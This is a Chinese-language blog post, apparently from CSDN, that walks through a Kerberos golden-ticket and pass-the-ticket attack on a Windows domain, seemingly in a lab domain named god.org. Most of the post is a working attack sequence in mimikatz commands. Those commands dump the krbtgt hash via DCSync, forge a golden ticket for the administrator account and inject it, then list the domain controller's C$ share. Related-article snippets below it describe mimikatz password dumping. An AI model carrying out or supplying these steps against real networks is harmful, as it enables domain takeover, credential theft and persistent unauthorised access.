ptt攻击

最新推荐文章于 2024-05-25 12:55:59 发布
最新推荐文章于 2024-05-25 12:55:59 发布
阅读量380 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48776804/article/details/117464995
版权

1 是什么

使用krbtgt用户hash生成的票据被称为黄金票据,伪造TGT,票据传递,不需要管理员权限就可以传递,mimikatz和kekeo传递
使用mimikatz把内存中的票据导出

2 怎么做

  • 黄金票据
    其实更像是一种留后门的方式,域控权限的维持,最重要的是获取到Krbtgt用户的hash,从域用户到域控

  • 实现条件
    域名、域账户、域sid、krbtgt哈希(ntlm、aes)

  • 攻击方式
    既可以使用ntlm,也可使用aes256
    有两种,直接在mimitatz生成使用,生成在同级目录下导入票据

3 具体怎么做

(1)信息收集
不过mimitatz报毒了,这个工具在实际情况下肯定不太好使

1 信息收集,把mimikatz上传到域成员机器(win7)
systeminfo	#域名
whoami /all	 #域账户、域sid
privilege::debug  #提权
lsadump::dcsync /domain:god.org /user:krbtgt
  • 域名: god.org
  • 域账户:administrator
  • 域sid:S-1-5-21-2952760202-1353902439-2381784089-500
  • krbtgt Hash NTLM:58e91a5ac358d86513ab224312314061
    在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

(2)伪造黄金票据

  • 制作票据
kerberos::purge  #清空票据
kerberos::list	 #列出票据
kerberos::golden /user:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089-500 /krbtgt:58e91a5ac358d86513ab224312314061

在这里插入图片描述
在这里插入图片描述

  • 导入票据
kerberos::ptt ticket.kirbi
kerberos::list

在这里插入图片描述

(3)查看域控根目录
dir \192.168.52.138\c$
在这里插入图片描述

4 甜点

  • 生成的黄金票据
    在这里插入图片描述
  • klist也可以查看票据(命令行直接执行)
    在这里插入图片描述

参考链接

  • https://blog.csdn.net/shuteer_xu/article/details/107031951
  • https://blog.csdn.net/zzgslh/article/details/106896431
  • https://blog.csdn.net/weixin_30791095/article/details/98036509
  • https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210531
wx_7782175678
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
蓝牙ptt耳机对讲协议
05-02
蓝牙ptt对讲耳机,可以扩展普通手机为行业对讲耳机。适合在行业内对讲与其他业务的整合
PTT-Crawler:专用于PTT网站的网络爬虫
04-30
PTT Crawler一个练习网路爬虫的小实验,可以取出PTT 文章中标题、内容与推文。使用方式批量爬取crawler = PttCrawler ()crawler . crawl ( board = "欲爬取的看版名稱" , start = StartIndex , end = EndIndex ) ...
PTT(pass the ticket)票据传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
11-03 2098
PTT票据传递攻击,(PTT)是一种使用Kerberos票据代替明文密码或NTLM哈希的方法。PTH基于NTLM认证进行攻击,而PTT基于kerberos协议进行攻击票据传递攻击,目的是伪造、窃取凭据提升权限。
PTT票据传递攻击
最新发布
Y22Lee的博客
05-25 367
PTT(Pass The Ticket),中文叫票据传递攻击PTT 攻击只能用于kerberos认证中,NTLM认证中没有, PTT是通过票据进行认证的。进行票据传递,不需要提权,域用户或者system用户就可以TGTSTPTH:用NTLM-HASH值进行认证-支持kerberos和NTLM认证PTK:用AES值进行认证-只能用于kerberos认证PTT:用票据进行认证-只能用于kerberos认证。
内网渗透之PPT票据传递攻击(Pass the Ticket)
qq_53742230的博客
07-31 1510
内网渗透之票据传递攻击
域渗透PTT票据传递攻击(Pass the Ticket)
Longwaer
01-21 1822
通过笔记全方位讲解,加速学习了解PTT票据传递攻击的方法及原理,更好的去掌握黄金、白银票据生成。
【内网安全】 横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射
今天是几号的博客
03-27 1231
PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。如果禁用了ntlm认证,PsExec无法利用获得的ntlm hash进行远程连接,但是使用mimikatz还是可以攻击成功。对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash来实现ptk攻击,总结:KB2871997补丁后的影响。
PyPtt:支持PTT还有PTT2的PTT API
02-03
yPyPttPTT库)是一套纯Python PTT API。具有大部分常用功能,无论推文,发文,爬虫,寄信,发P币,丢水球或追踪帐号,你都可以在这里找到完整的使用范例API的详细与参数说明Pypi: ://pypi.org/project/PyPtt/为...
PTT精选模板
12-15
【标题】"PTT精选模板"所指的是一种专门用于制作高质量演示文稿的PowerPoint模板集合。在商业、教育和其他领域,一个吸引人的PPT模板可以极大地提升演示文稿的专业性和吸引力,使得观众更容易理解和接受信息。这些...
内网渗透-PTH&PTT&PTK
G208_522的博客
10-26 1200
内网渗透系列
票据传递攻击
qq_56426046的博客
11-12 965
在 Kerberos 认证中,Client 通过 AS(身份认证服务)认证后,AS 会给Client 一个Logon Session Key 和 TGT,而 Logon Session Key 并不会保存在KDC 中,krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造TGT和Logon Session Key 来进入下一步 Client 与 TGS 的交互。白银票据的利用过程是伪造TGS,通过已知的授权服务密码生成一张可以访问该服务的TGT。
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
mimikatz的使用
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-15 3万+
mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 这里抓到了administrator的账号,密码是null,说明没设密码 注意: 1、 文件夹里有两个版本,一个是对应32位系统的,一个是64位系
68内网安全-域横向PTH&PTK&PTT哈希票据传递
san3144393495的博客
12-29 1523
今天讲PTH&PTK&PTT,PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 用的Kerberos 协议PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试lm加密算法是2003以前的老版,2003用户均为ntlm 算法的hash。
它丫的,终于面试通过了,小白渗透面试题分享
jklbnm12的博客
06-29 650
作为才入职的小菜鸟,心里太有感慨了。。。我他丫的,本菜鸟终于可以工作了,从事我喜欢的、期待已久的工作开心。。。路漫漫其修远兮,吾将上下而求索。fightingHW结束了浪了小半个月,就开始准备面试了,然后到十一月中旬接到我心心念念的公司的offer为止,收到大概5、6家公司的offer。嗯,感谢安全的大佬们对面试时的我手下留情。。 总结一下下我的面试题。。。 web部分: 1. sql注入部分 SQL注入原理 SQL注入的种类? SQL注入的绕过有了解过吗?有绕过那些WAF?绕WAF的方法有哪些? 介绍一
一个获取系统密码的小工具
weixin_34037515的博客
11-28 111
   今天回家干了很多家务活,家里太乱了,晚上开始整理资料。这几天有点迷恋游戏,呵呵,虽然是挂机在玩,但是我觉得仍然有些耽误时间和精力,最近事情比较多,也比较忙,等有空和清闲的时候再玩游戏。关于本主题中所提到的软件,非常好用,不过需要在管理员权限下才能读取系统中的密码,获取的密码是系统默认的密码,如果系统修改了默认密码,读取的密码还是老的密码。软件放在附件中,感兴趣的朋友可以下载回去玩玩。欢迎一起...
mimikatz实战域渗透抓取域控管理员密码
404
02-07 1万+
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载 条件:靶机获取到shell之后必须是管理员的权限 步骤: **我这里攻击利用的msf里面的regsvr32_applocker_bypass_ser
蓝牙PTT触发Bluetooth PTT 代码
03-02
以下是一个基于Android平台的蓝牙PTT触发器的Bluetooth PTT代码示例: ``` BluetoothAdapter mBluetoothAdapter = BluetoothAdapter.getDefaultAdapter(); BluetoothDevice mBluetoothDevice = mBluetoothAdapter....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值